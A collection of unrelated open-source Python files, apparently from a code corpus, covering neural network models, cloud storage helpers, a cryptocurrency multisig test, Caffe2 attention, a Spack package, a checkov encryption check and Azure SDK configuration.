# Modified from: https://github.com/pliang279/LG-FedAvg/blob/master/models/Nets.py
# credit goes to: Paul Pu Liang
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Python version: 3.6
import torch
from torch import nn
import torch.nn.functional as F
from torchvision import models
import json
import numpy as np
from models.language_utils import get_word_emb_arr
class MLP(nn.Module):
def __init__(self, dim_in, dim_hidden, dim_out):
super(MLP, self).__init__()
self.layer_input = nn.Linear(dim_in, 512)
self.relu = nn.ReLU()
self.dropout = nn.Dropout(0)
self.layer_hidden1 = nn.Linear(512, 256)
self.layer_hidden2 = nn.Linear(256, 64)
self.layer_out = nn.Linear(64, dim_out)
self.softmax = nn.Softmax(dim=1)
self.weight_keys = [['layer_input.weight', 'layer_input.bias'],
['layer_hidden1.weight', 'layer_hidden1.bias'],
['layer_hidden2.weight', 'layer_hidden2.bias'],
['layer_out.weight', 'layer_out.bias']
]
def forward(self, x):
x = x.view(-1, x.shape[1]*x.shape[-2]*x.shape[-1])
x = self.layer_input(x)
x = self.relu(x)
x = self.layer_hidden1(x)
x = self.relu(x)
x = self.layer_hidden2(x)
x = self.relu(x)
x = self.layer_out(x)
return self.softmax(x)
class CNNMnist(nn.Module):
def __init__(self, args):
super(CNNMnist, self).__init__()
self.conv1 = nn.Conv2d(1, 64, kernel_size=5)
self.conv2 = nn.Conv2d(64, 64, kernel_size=5)
self.conv2_drop = nn.Dropout2d()
self.fc1 = nn.Linear(1024, 128)
self.fc2 = nn.Linear(128, 64)
self.fc3 = nn.Linear(64, args.num_classes)
def forward(self, x):
x = F.relu(F.max_pool2d(self.conv1(x), 2))
x = F.relu(F.max_pool2d(self.conv2_drop(self.conv2(x)), 2))
x = x.view(-1, x.shape[1]*x.shape[2]*x.shape[3])
x = F.relu(self.fc1(x))
x = F.relu(self.fc2(x))
x = self.fc3(x)
return F.log_softmax(x, dim=1)
class CNNCifar(nn.Module):
def __init__(self, args):
super(CNNCifar, self).__init__()
self.conv1 = nn.Conv2d(3, 64, 5)
self.pool = nn.MaxPool2d(2, 2)
self.conv2 = nn.Conv2d(64, 64, 5)
self.fc1 = nn.Linear(64 * 5 * 5, 120)
self.fc2 = nn.Linear(120, 64)
self.fc3 = nn.Linear(64, args.num_classes)
self.cls = args.num_classes
# self.drop = nn.Dropout(0.6)
self.weight_keys = [['fc1.weight', 'fc1.bias'],
['fc2.weight', 'fc2.bias'],
['fc3.weight', 'fc3.bias'],
['conv2.weight', 'conv2.bias'],
['conv1.weight', 'conv1.bias'],
]
def forward(self, x):
x = self.pool(F.relu(self.conv1(x)))
x = self.pool(F.relu(self.conv2(x)))
x = x.view(-1, 64 * 5 * 5)
x = F.relu(self.fc1(x))
x = F.relu(self.fc2(x))
# x = self.drop(self.fc3(x))
x = self.fc3(x)
return F.log_softmax(x, dim=1)
class CNNCifar100(nn.Module):
def __init__(self, args):
super(CNNCifar100, self).__init__()
self.conv1 = nn.Conv2d(3, 64, 5)
self.pool = nn.MaxPool2d(2, 2)
self.drop = nn.Dropout(0.6)
self.conv2 = nn.Conv2d(64, 128, 5)
self.fc1 = nn.Linear(128 * 5 * 5, 256)
self.fc2 = nn.Linear(256, 128)
self.fc3 = nn.Linear(128, args.num_classes)
self.cls = args.num_classes
self.weight_keys = [['fc1.weight', 'fc1.bias'],
['fc2.weight', 'fc2.bias'],
['fc3.weight', 'fc3.bias'],
['conv2.weight', 'conv2.bias'],
['conv1.weight', 'conv1.bias'],
]
def forward(self, x):
x = self.pool(F.relu(self.conv1(x)))
x = self.pool(F.relu(self.conv2(x)))
x = x.view(-1, 128 * 5 * 5)
x = F.relu(self.fc1(x))
x = self.drop((F.relu(self.fc2(x))))
x = self.fc3(x)
return F.log_softmax(x, dim=1)
class CNN_FEMNIST(nn.Module):
def __init__(self, args):
super(CNN_FEMNIST, self).__init__()
self.conv1 = nn.Conv2d(1, 4, 5)
self.pool = nn.MaxPool2d(2, 2)
self.conv2 = nn.Conv2d(4, 12, 5)
self.fc1 = nn.Linear(12 * 4 * 4, 120)
self.fc2 = nn.Linear(120, 100)
self.fc3 = nn.Linear(100, args.num_classes)
self.weight_keys = [['fc1.weight', 'fc1.bias'],
['fc2.weight', 'fc2.bias'],
['fc3.weight', 'fc3.bias'],
['conv2.weight', 'conv2.bias'],
['conv1.weight', 'conv1.bias'],
]
def forward(self, x):
x = self.pool(F.relu(self.conv1(x)))
x = self.pool(F.relu(self.conv2(x)))
x = x.view(-1, 12 * 4 * 4)
x = F.relu(self.fc1(x))
x = F.relu(self.fc2(x))
x = self.fc3(x)
return F.log_softmax(x, dim=1)
class RNNSent(nn.Module):
"""
Container module with an encoder, a recurrent module, and a decoder.
Modified by: Hongyi Wang from https://github.com/pytorch/examples/blob/master/word_language_model/model.py
"""
def __init__(self,args, rnn_type, ntoken, ninp, nhid, nlayers, dropout=0.5, tie_weights=False, emb_arr=None):
super(RNNSent, self).__init__()
VOCAB_DIR = 'models/embs.json'
emb, self.indd, vocab = get_word_emb_arr(VOCAB_DIR)
self.encoder = torch.tensor(emb).to(args.device)
if rnn_type in ['LSTM', 'GRU']:
self.rnn = getattr(nn, rnn_type)(ninp, nhid, nlayers)
else:
try:
nonlinearity = {'RNN_TANH': 'tanh', 'RNN_RELU': 'relu'}[rnn_type]
except KeyError:
raise ValueError( """An invalid option for `--model` was supplied,
options are ['LSTM', 'GRU', 'RNN_TANH' or 'RNN_RELU']""")
self.rnn = nn.RNN(ninp, nhid, nlayers, nonlinearity=nonlinearity, dropout=dropout)
self.fc = nn.Linear(nhid, 10)
self.decoder = nn.Linear(10, ntoken)
# "Using the Output Embedding to Improve Language Models" (Press & Wolf 2016)
# https://arxiv.org/abs/1608.05859
# and
# "Tying Word Vectors and Word Classifiers: A Loss Framework for Language Modeling" (Inan et al. 2016)
# https://arxiv.org/abs/1611.01462
if tie_weights:
if nhid != ninp:
raise ValueError('When using the tied flag, nhid must be equal to emsize')
self.decoder.weight = self.encoder.weight
self.drop = nn.Dropout(dropout)
self.init_weights()
self.rnn_type = rnn_type
self.nhid = nhid
self.nlayers = nlayers
self.device = args.device
def init_weights(self):
initrange = 0.1
self.fc.bias.data.zero_()
self.fc.weight.data.uniform_(-initrange, initrange)
self.decoder.bias.data.zero_()
self.decoder.weight.data.uniform_(-initrange, initrange)
def forward(self, input, hidden):
input = torch.transpose(input, 0,1)
emb = torch.zeros((25,4,300))
for i in range(25):
for j in range(4):
emb[i,j,:] = self.encoder[input[i,j],:]
emb = emb.to(self.device)
emb = emb.view(300,4,25)
self.rnn.flatten_parameters()
output, hidden = self.rnn(emb, hidden)
output = self.drop(F.relu(self.fc(output)))
decoded = self.decoder(output[-1,:,:])
return decoded.t(), hidden
def init_hidden(self, bsz):
weight = next(self.parameters())
if self.rnn_type == 'LSTM':
return (weight.new_zeros(self.nlayers, bsz, self.nhid),
weight.new_zeros(self.nlayers, bsz, self.nhid))
else:
return weight.new_zeros(self.nlayers, bsz, self.nhid)
|
the-stack_106_16908
|
from typing import Iterator, Optional, Set, Union
from google.cloud.storage import Bucket
from storage_bucket.client import get_client
def list_buckets(
max_results: Optional[int] = None,
page_token: Optional[str] = None,
prefix: Optional[str] = None,
fields: Optional[Set] = None,
projection: str = 'noAcl',
project: Optional[str] = None,
timeout: Union[float, int] = 60,
) -> Set[Bucket]:
"""List Buckets, but return Set[Bucket] instead of ResultE[Set[Bucket]].
Raise exception when Modal is in failure state.
"""
client = get_client()
return client.list_buckets(
max_results=max_results,
page_token=page_token,
prefix=prefix,
fields=fields,
projection=projection,
project=project,
timeout=timeout,
)
def list_bucket_names(buckets: Set[Bucket]) -> Iterator[str]:
"""Iterate over Buckets and retrieve their names.
Raise NoneType Exception when Bucket is None.
"""
return map(lambda bucket: bucket.name, buckets)
|
the-stack_106_16913
|
#!/usr/bin/env python3
# Copyright (c) 2015-2016 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
# Test new Arvcoin multisig prefix functionality.
#
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import (
assert_equal,
connect_nodes,
)
class ScriptAddress2Test(BitcoinTestFramework):
def set_test_params(self):
self.num_nodes = 3
self.setup_clean_chain = True
self.extra_args = [['-addresstype=legacy', '-deprecatedrpc=accounts', '-txindex=1'], [], ['-txindex=1']]
def setup_network(self, split=False):
self.setup_nodes()
connect_nodes(self.nodes[1], 0)
connect_nodes(self.nodes[2], 0)
self.sync_all()
def skip_test_if_missing_module(self):
self.skip_if_no_wallet()
def run_test(self):
cnt = self.nodes[0].getblockcount()
# Mine some blocks
self.nodes[1].generate(101)
self.sync_all()
if (self.nodes[0].getblockcount() != cnt + 101):
raise AssertionError("Failed to mine 100 blocks")
addr = self.nodes[0].getnewaddress()
addr2 = self.nodes[0].getnewaddress()
multisig_addr = self.nodes[0].addmultisigaddress(2, [addr, addr2], "multisigaccount")['address']
assert_equal(multisig_addr[0], 'Q')
# Send to a new multisig address
txid = self.nodes[1].sendtoaddress(multisig_addr, 1)
self.nodes[1].generate(101)
self.sync_all()
tx = self.nodes[0].getrawtransaction(txid, 1)
dest_addrs = [tx["vout"][0]['scriptPubKey']['addresses'][0],
tx["vout"][1]['scriptPubKey']['addresses'][0]]
assert(multisig_addr in dest_addrs)
# Spend from the new multisig address
addr3 = self.nodes[1].getnewaddress()
txid = self.nodes[0].sendtoaddress(addr3, 0.8)
self.nodes[0].generate(2)
self.sync_all()
assert(self.nodes[0].getbalance("*", 1) < 0.2)
assert(self.nodes[1].listtransactions()[-1]['address'] == addr3)
# Send to an old multisig address. The api addmultisigaddress
# can only generate a new address so we manually compute
# multisig_addr_old beforehand using an old client.
priv_keys = ["cU7eeLPKzXeKMeZvnEJhvZZ3tLqVF3XGeo1BbM8dnbmV7pP3Qg89",
"cTw7mRhSvTfzqCt6MFgBoTBqwBpYu2rWugisXcwjv4cAASh3iqPt"]
addrs = ["mj6gNGRXPXrD69R5ApjcsDerZGrYKSfb6v",
"mqET4JA3L7P7FoUjUP3F6m6YsLpCkyzzou"]
self.nodes[0].importprivkey(priv_keys[0])
self.nodes[0].importprivkey(priv_keys[1])
multisig_addr_new = self.nodes[0].addmultisigaddress(2, addrs, "multisigaccount2")['address']
assert_equal(multisig_addr_new, 'QZ974ZrPrmqMmm1PSVp4m8YEgo3bCQZBbe')
multisig_addr_old = "2N5nLwYz9qfnGdaFLpPn3gS6oYQbmLTWPjq"
# Let's send to the old address. We can then find it in the
# new address with the new client. So basically the old
# address and the new one are the same thing.
txid = self.nodes[1].sendtoaddress(multisig_addr_old, 1)
self.nodes[1].generate(1)
self.sync_all()
tx = self.nodes[2].getrawtransaction(txid, 1)
dest_addrs = [tx["vout"][0]['scriptPubKey']['addresses'][0],
tx["vout"][1]['scriptPubKey']['addresses'][0]]
assert(multisig_addr_new in dest_addrs)
assert(multisig_addr_old not in dest_addrs)
# Spend from the new multisig address
addr4 = self.nodes[1].getnewaddress()
txid = self.nodes[0].sendtoaddress(addr4, 0.8)
self.nodes[0].generate(2)
self.sync_all()
assert(self.nodes[0].getbalance("*", 1) < 0.4)
assert(self.nodes[1].listtransactions()[-1]['address'] == addr4)
if __name__ == '__main__':
ScriptAddress2Test().main()
|
the-stack_106_16917
|
## @package attention
# Module caffe2.python.attention
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
class AttentionType:
Regular, Recurrent = range(2)
def s(scope, name):
# We have to manually scope due to our internal/external blob
# relationships.
return "{}/{}".format(str(scope), str(name))
# c_i = \sum_j w_{ij}\textbf{s}_j
def _calc_weighted_context(
model,
encoder_outputs_transposed,
encoder_output_dim,
attention_weights_3d,
scope,
):
# [batch_size, encoder_output_dim, 1]
attention_weighted_encoder_context = model.net.BatchMatMul(
[encoder_outputs_transposed, attention_weights_3d],
s(scope, 'attention_weighted_encoder_context'),
)
# TODO: somehow I cannot use Squeeze in-place op here
# [batch_size, encoder_output_dim]
attention_weighted_encoder_context, _ = model.net.Reshape(
attention_weighted_encoder_context,
[
attention_weighted_encoder_context,
s(scope, 'attention_weighted_encoder_context_old_shape')
],
shape=[1, -1, encoder_output_dim],
)
return attention_weighted_encoder_context
# Calculate a softmax over the passed in attention energy logits
def _calc_attention_weights(
model,
attention_logits_transposed,
scope
):
# TODO: we could try to force some attention weights to be zeros,
# based on encoder_lengths.
# [batch_size, encoder_length]
attention_weights = model.Softmax(
attention_logits_transposed,
s(scope, 'attention_weights'),
engine='CUDNN',
)
# TODO: make this operation in-place
# [batch_size, encoder_length, 1]
attention_weights_3d = model.net.ExpandDims(
attention_weights,
s(scope, 'attention_weights_3d'),
dims=[2],
)
return attention_weights_3d
# e_{ij} = \textbf{v}^T tanh \alpha(\textbf{h}_{i-1}, \textbf{s}_j)
def _calc_attention_logits_from_sum_match(
model,
decoder_hidden_encoder_outputs_sum,
encoder_output_dim,
scope
):
# [encoder_length, batch_size, encoder_output_dim]
decoder_hidden_encoder_outputs_sum = model.net.Tanh(
decoder_hidden_encoder_outputs_sum,
decoder_hidden_encoder_outputs_sum,
)
attention_v = model.param_init_net.XavierFill(
[],
s(scope, 'attention_v'),
shape=[1, encoder_output_dim],
)
model.add_param(attention_v)
attention_zeros = model.param_init_net.ConstantFill(
[],
s(scope, 'attention_zeros'),
value=0.0,
shape=[1],
)
# [encoder_length, batch_size, 1]
attention_logits = model.net.FC(
[decoder_hidden_encoder_outputs_sum, attention_v, attention_zeros],
[s(scope, 'attention_logits')],
axis=2
)
# [encoder_length, batch_size]
attention_logits = model.net.Squeeze(
[attention_logits],
[attention_logits],
dims=[2],
)
# [batch_size, encoder_length]
attention_logits_transposed = model.Transpose(
attention_logits,
s(scope, 'attention_logits_transposed'),
axes=[1, 0],
)
return attention_logits_transposed
# \textbf{W}^\alpha used in the context of \alpha_{sum}(a,b)
def _apply_fc_weight_for_sum_match(
model,
input,
dim_in,
dim_out,
scope,
name
):
output = model.FC(
input,
s(scope, name),
dim_in=dim_in,
dim_out=dim_out,
axis=2,
)
output = model.net.Squeeze(
output,
output,
dims=[0]
)
return output
# Implement RecAtt due to section 4.1 in http://arxiv.org/abs/1601.03317
def apply_recurrent_attention(
model,
encoder_output_dim,
encoder_outputs_transposed,
weighted_encoder_outputs,
decoder_hidden_state_t,
decoder_hidden_state_dim,
attention_weighted_encoder_context_t_prev,
scope,
):
weighted_prev_attention_context = _apply_fc_weight_for_sum_match(
model=model,
input=attention_weighted_encoder_context_t_prev,
dim_in=encoder_output_dim,
dim_out=encoder_output_dim,
scope=scope,
name='weighted_prev_attention_context'
)
weighted_decoder_hidden_state = _apply_fc_weight_for_sum_match(
model=model,
input=decoder_hidden_state_t,
dim_in=decoder_hidden_state_dim,
dim_out=encoder_output_dim,
scope=scope,
name='weighted_decoder_hidden_state'
)
# [encoder_length, batch_size, encoder_output_dim]
decoder_hidden_encoder_outputs_sum_tmp = model.net.Add(
[
weighted_encoder_outputs,
weighted_decoder_hidden_state
],
s(scope, 'decoder_hidden_encoder_outputs_sum_tmp'),
broadcast=1,
use_grad_hack=1,
)
# [encoder_length, batch_size, encoder_output_dim]
decoder_hidden_encoder_outputs_sum = model.net.Add(
[
decoder_hidden_encoder_outputs_sum_tmp,
weighted_prev_attention_context
],
s(scope, 'decoder_hidden_encoder_outputs_sum'),
broadcast=1,
use_grad_hack=1,
)
attention_logits_transposed = _calc_attention_logits_from_sum_match(
model=model,
decoder_hidden_encoder_outputs_sum=decoder_hidden_encoder_outputs_sum,
encoder_output_dim=encoder_output_dim,
scope=scope
)
# [batch_size, encoder_length, 1]
attention_weights_3d = _calc_attention_weights(
model=model,
attention_logits_transposed=attention_logits_transposed,
scope=scope
)
# [batch_size, encoder_output_dim, 1]
attention_weighted_encoder_context = _calc_weighted_context(
model=model,
encoder_outputs_transposed=encoder_outputs_transposed,
encoder_output_dim=encoder_output_dim,
attention_weights_3d=attention_weights_3d,
scope=scope
)
return attention_weighted_encoder_context, attention_weights_3d, [
decoder_hidden_encoder_outputs_sum_tmp,
decoder_hidden_encoder_outputs_sum
]
def apply_regular_attention(
model,
encoder_output_dim,
encoder_outputs_transposed,
weighted_encoder_outputs,
decoder_hidden_state_t,
decoder_hidden_state_dim,
scope,
):
weighted_decoder_hidden_state = _apply_fc_weight_for_sum_match(
model=model,
input=decoder_hidden_state_t,
dim_in=decoder_hidden_state_dim,
dim_out=encoder_output_dim,
scope=scope,
name='weighted_decoder_hidden_state'
)
# [encoder_length, batch_size, encoder_output_dim]
decoder_hidden_encoder_outputs_sum = model.net.Add(
[weighted_encoder_outputs, weighted_decoder_hidden_state],
s(scope, 'decoder_hidden_encoder_outputs_sum'),
broadcast=1,
use_grad_hack=1,
)
attention_logits_transposed = _calc_attention_logits_from_sum_match(
model=model,
decoder_hidden_encoder_outputs_sum=decoder_hidden_encoder_outputs_sum,
encoder_output_dim=encoder_output_dim,
scope=scope
)
# [batch_size, encoder_length, 1]
attention_weights_3d = _calc_attention_weights(
model=model,
attention_logits_transposed=attention_logits_transposed,
scope=scope
)
# [batch_size, encoder_output_dim, 1]
attention_weighted_encoder_context = _calc_weighted_context(
model=model,
encoder_outputs_transposed=encoder_outputs_transposed,
encoder_output_dim=encoder_output_dim,
attention_weights_3d=attention_weights_3d,
scope=scope
)
return attention_weighted_encoder_context, attention_weights_3d, [
decoder_hidden_encoder_outputs_sum
]
|
the-stack_106_16918
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# (c) The James Hutton Institute 2017-2019
# (c) The University of Strathclyde 2019
# Author: Leighton Pritchard
#
# Contact:
# [email protected]
#
# Leighton Pritchard,
# Strathclyde Institute of Pharmaceutical and Biomedical Sciences
# The University of Strathclyde
# Cathedral Street
# Glasgow
# G1 1XQ
# Scotland,
# UK
#
# The MIT License
#
# Copyright (c) 2017-2018 The James Hutton Institute
# (c) The University of Strathclyde 2019
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
"""Code to implement graphics output for ANI analyses."""
# Force matplotlib NOT to use an Xwindows backend on *nix, so that
# _tkinter.TclError is avoided when there is no $DISPLAY env: this can occur
# when running the package/script via ssh
# See http://stackoverflow.com/questions/2801882/\
# generating-a-png-with-matplotlib-when-display-is-undefined
# This needs to be done before importing pyplot
from typing import Dict, Optional, Tuple
import matplotlib # pylint: disable=C0411
from . import mpl # noqa: F401 # matplotlib wrappers
from . import sns # noqa: F401 # seaborn wrappers
# Specify matplotlib backend. This *must* be done before pyplot import, but
# raises errors with flake8 etc. So we comment out the specific error
matplotlib.use("Agg")
import matplotlib.pyplot as plt # noqa: E402,E501 # pylint: disable=wrong-import-position,wrong-import-order
# Convenience class to hold heatmap graphics parameters
class Params: # pylint: disable=too-few-public-methods
"""Convenience class to hold heatmap rendering parameters."""
def __init__(
self,
params: Tuple,
labels: Optional[Dict] = None,
classes: Optional[Dict] = None,
):
"""Instantiate class.
:param params:
:param labels:
:param classes:
"""
self.cmap = plt.get_cmap(params[0])
self.vmin = params[1]
self.vmax = params[2]
self.labels = labels
self.classes = classes
@property
def vdiff(self):
"""Return difference between max and min values for presentation."""
return max(0.01, self.vmax - self.vmin)
|
the-stack_106_16919
|
# Copyright 2013-2019 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class SicmHigh(CMakePackage):
"""SICM's high-level interface. Seeks to automatically
profile and manage memory usage on heterogeneous memory systems."""
homepage = "https://github.com/lanl/SICM/"
git = "https://github.com/lanl/SICM"
version('develop', commit='HEAD')
depends_on('flang@20180921', patches=['0.patch', '1.patch', '2.patch', '3.patch'])
depends_on('[email protected]+je', patches=['jemalloc_maxarenas1.patch', 'jemalloc_maxarenas2.patch'])
depends_on('numactl')
depends_on('libpfm4')
def cmake_args(self):
args = ['-DSICM_BUILD_HIGH_LEVEL=True']
return args
# Run "make test" after the install target.
@run_after('build')
@on_package_attributes(run_tests=True)
def check_build(self):
make("test")
|
the-stack_106_16920
|
import pathlib
import random
import shutil
import subprocess
import sys
from abc import abstractmethod
from dataclasses import dataclass
from typing import Dict, Tuple, Callable
import tabsave
TEST_ROOT_DIR = pathlib.Path.home() / '.tabsave_test'
TEST_GAME_SAVE_DIR = TEST_ROOT_DIR / 'They Are Billions' / 'Saves'
CONFIG_FILE_PATH = TEST_ROOT_DIR / tabsave.CONFIG_FILE_NAME
class RunResult:
def __init__(self, return_value=None, exception=None):
self.return_value = return_value
self.exception = exception
def __str__(self):
return {'return_value': self.return_value, 'exception': self.exception}.__str__()
def __repr__(self):
return {'return_value': self.return_value, 'exception': self.exception}.__repr__()
def __eq__(self, other):
if not isinstance(other, RunResult):
return False
else:
return all(getattr(self, attr) == getattr(other, attr) for attr in ['return_value', 'exception'])
class Runnable:
"""A class that creates a callable that has pre-defined arguments"""
def __repr__(self):
return self.__str__()
def __str__(self):
return f"{{callable: {self._dict['callable'].__name__}, args: {self._dict['args']}, " \
f"kwargs: {self._dict['kwargs']}}}"
def __init__(self, callable_to_run: Callable, *args, **kwargs):
self._dict = {'callable': callable_to_run,
'args': args,
'kwargs': kwargs}
def __call__(self, *args, **kwargs):
return_value = None
exception = None
args = (*self._dict['args'], *args)
tmp = kwargs
kwargs = self._dict['kwargs'].copy()
kwargs.update(tmp)
del tmp
try:
return_value = self._dict['callable'](*args, **kwargs)
except Exception as e:
exception = e
return RunResult(return_value, exception)
def before_all(context):
# setup context
context.results = []
def _add_result(r: Runnable):
result = r()
context.results.append(result)
return result
context.add_result = _add_result
def before_scenario(context, scenario):
# change the config path to a test location
tabsave.Config._test_setup(CONFIG_FILE_PATH)
# setup context
context.results = []
# create the test game save directory
TEST_GAME_SAVE_DIR.mkdir(parents=True, exist_ok=True)
# create config file if we are not testing its creation
if 'config_setup_test' not in scenario.tags:
config_dir_path_str = TEST_GAME_SAVE_DIR.resolve()
# create the config file
with open(CONFIG_FILE_PATH, 'w') as file:
file.write(f'save_dir: {config_dir_path_str}\n')
def after_scenario(context, feature):
# delete the test directory and all of its files
shutil.rmtree(TEST_ROOT_DIR)
def game_save_exists(save_name: str) -> bool:
return all((TEST_GAME_SAVE_DIR / f'{save_name}{ending}').is_file() for ending in ('.zxcheck', '.zxsav'))
def game_save_backup_exists(save_name) -> bool:
return all((TEST_GAME_SAVE_DIR / f'{save_name}{ending}').is_file() for ending
in ('_Backup.zxcheck', '_Backup.zxsav'))
def create_game_save(save_name: str, create_backupzx_files=False) -> Dict[pathlib.Path, int]:
endings = ('.zxcheck', '.zxsav', '_Backup.zxcheck', '_Backup.zxsav') if create_backupzx_files \
else ('.zxcheck', '.zxsav')
d = {}
for ending in endings:
random_int = random.randint(0, 1000000)
path = TEST_GAME_SAVE_DIR / f'{save_name}{ending}'
d[path] = random_int
with open(path, 'w') as file:
file.write(f"{save_name} - {random_int}\n")
return d
def remove_game_saves(save_name: str):
endings = ('.zxcheck', '.zxsav', '_Backup.zxcheck', '_Backup.zxsav')
for ending in endings:
path = TEST_GAME_SAVE_DIR / f'{save_name}{ending}'
if path.is_file():
path.unlink()
def get_argument_list(raw_str: str) -> Tuple[str]:
args = []
arg = []
escaped = False
current_quote = ''
for ch in raw_str:
if escaped:
arg.append(ch)
escaped = False
else:
if ch == '\\':
escaped = True
elif current_quote:
if ch != current_quote:
arg.append(ch)
else:
args.append(''.join(arg))
arg = []
current_quote = ''
elif ch == ' ':
if arg:
args.append(''.join(arg))
arg = []
else:
... # it's leading whitespace, just ignore it.
elif ch in ['"', "'"] and not arg: # leading quote
current_quote = ch
else:
arg.append(ch)
if arg:
args.append(''.join(arg))
arg = []
if current_quote:
raise ValueError(f'<{raw_str}> could not be parsed because of an unclosed {current_quote} quotation mark.')
return tuple((arg for arg in args if isinstance(arg, str)))
def get_next_run_result(context) -> RunResult:
return context.results.pop(0)
|
the-stack_106_16921
|
from checkov.common.models.enums import CheckCategories, CheckResult
from checkov.terraform.checks.resource.base_resource_value_check import BaseResourceValueCheck
class RDSClusterSnapshotEncrypted(BaseResourceValueCheck):
def __init__(self):
name = "Ensure that RDS database cluster snapshot is encrypted"
id = "CKV_AWS_153"
supported_resources = ['aws_db_cluster_snapshot']
categories = [CheckCategories.ENCRYPTION]
super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)
def get_inspected_key(self):
return 'storage_encrypted'
check = RDSClusterSnapshotEncrypted()
|
the-stack_106_16922
|
"""
A trainer class.
"""
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.autograd import Variable
import numpy as np
from model.aggcn import GCNClassifier
from utils import torch_utils
class Trainer(object):
def __init__(self, opt, emb_matrix=None):
raise NotImplementedError
def update(self, batch):
raise NotImplementedError
def predict(self, batch):
raise NotImplementedError
def update_lr(self, new_lr):
torch_utils.change_lr(self.optimizer, new_lr)
def load(self, filename):
try:
checkpoint = torch.load(filename)
except BaseException:
print("Cannot load model from {}".format(filename))
exit()
self.model.load_state_dict(checkpoint['model'])
self.opt = checkpoint['config']
def save(self, filename, epoch):
params = {
'model': self.model.state_dict(),
'config': self.opt,
}
try:
torch.save(params, filename)
print("model saved to {}".format(filename))
except BaseException:
print("[Warning: Saving failed... continuing anyway.]")
def unpack_batch(batch, cuda):
if cuda:
inputs = [Variable(b.cuda()) for b in batch[:10]]
labels = Variable(batch[10].cuda())
else:
inputs = [Variable(b) for b in batch[:10]]
labels = Variable(batch[10])
tokens = batch[0]
head = batch[5]
subj_pos = batch[6]
obj_pos = batch[7]
lens = batch[1].eq(0).long().sum(1).squeeze()
return inputs, labels, tokens, head, subj_pos, obj_pos, lens
class GCNTrainer(Trainer):
def __init__(self, opt, emb_matrix=None):
self.opt = opt
self.emb_matrix = emb_matrix
self.model = GCNClassifier(opt, emb_matrix=emb_matrix)
self.criterion = nn.CrossEntropyLoss()
self.parameters = [p for p in self.model.parameters() if p.requires_grad]
if opt['cuda']:
self.model.cuda()
self.criterion.cuda()
self.optimizer = torch_utils.get_optimizer(opt['optim'], self.parameters, opt['lr'])
def update(self, batch):
inputs, labels, tokens, head, subj_pos, obj_pos, lens = unpack_batch(batch, self.opt['cuda'])
# step forward
self.model.train()
self.optimizer.zero_grad()
logits, pooling_output = self.model(inputs)
loss = self.criterion(logits, labels)
# l2 decay on all conv layers
if self.opt.get('conv_l2', 0) > 0:
loss += self.model.conv_l2() * self.opt['conv_l2']
# l2 penalty on output representations
if self.opt.get('pooling_l2', 0) > 0:
loss += self.opt['pooling_l2'] * (pooling_output ** 2).sum(1).mean()
loss_val = loss.item()
# backward
loss.backward()
torch.nn.utils.clip_grad_norm_(self.model.parameters(), self.opt['max_grad_norm'])
self.optimizer.step()
return loss_val
def predict(self, batch, unsort=True):
inputs, labels, tokens, head, subj_pos, obj_pos, lens = unpack_batch(batch, self.opt['cuda'])
orig_idx = batch[11]
# forward
self.model.eval()
logits, _ = self.model(inputs)
loss = self.criterion(logits, labels)
probs = F.softmax(logits, 1).data.cpu().numpy().tolist()
predictions = np.argmax(logits.data.cpu().numpy(), axis=1).tolist()
if unsort:
_, predictions, probs = [list(t) for t in zip(*sorted(zip(orig_idx,\
predictions, probs)))]
return predictions, probs, loss.item()
|
the-stack_106_16923
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from typing import Any, TYPE_CHECKING
from azure.core.configuration import Configuration
from azure.core.pipeline import policies
from azure.mgmt.core.policies import ARMHttpLoggingPolicy
from .._version import VERSION
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from azure.core.credentials_async import AsyncTokenCredential
class ComputeManagementClientConfiguration(Configuration):
"""Configuration for ComputeManagementClient.
Note that all parameters used to create this instance are saved as instance
attributes.
:param credential: Credential needed for the client to connect to Azure.
:type credential: ~azure.core.credentials_async.AsyncTokenCredential
:param subscription_id: Subscription credentials which uniquely identify Microsoft Azure subscription. The subscription ID forms part of the URI for every service call.
:type subscription_id: str
"""
def __init__(
self,
credential: "AsyncTokenCredential",
subscription_id: str,
**kwargs # type: Any
) -> None:
if credential is None:
raise ValueError("Parameter 'credential' must not be None.")
if subscription_id is None:
raise ValueError("Parameter 'subscription_id' must not be None.")
super(ComputeManagementClientConfiguration, self).__init__(**kwargs)
self.credential = credential
self.subscription_id = subscription_id
self.credential_scopes = kwargs.pop('credential_scopes', ['https://management.azure.com/.default'])
kwargs.setdefault('sdk_moniker', 'azure-mgmt-compute/{}'.format(VERSION))
self._configure(**kwargs)
def _configure(
self,
**kwargs: Any
) -> None:
self.user_agent_policy = kwargs.get('user_agent_policy') or policies.UserAgentPolicy(**kwargs)
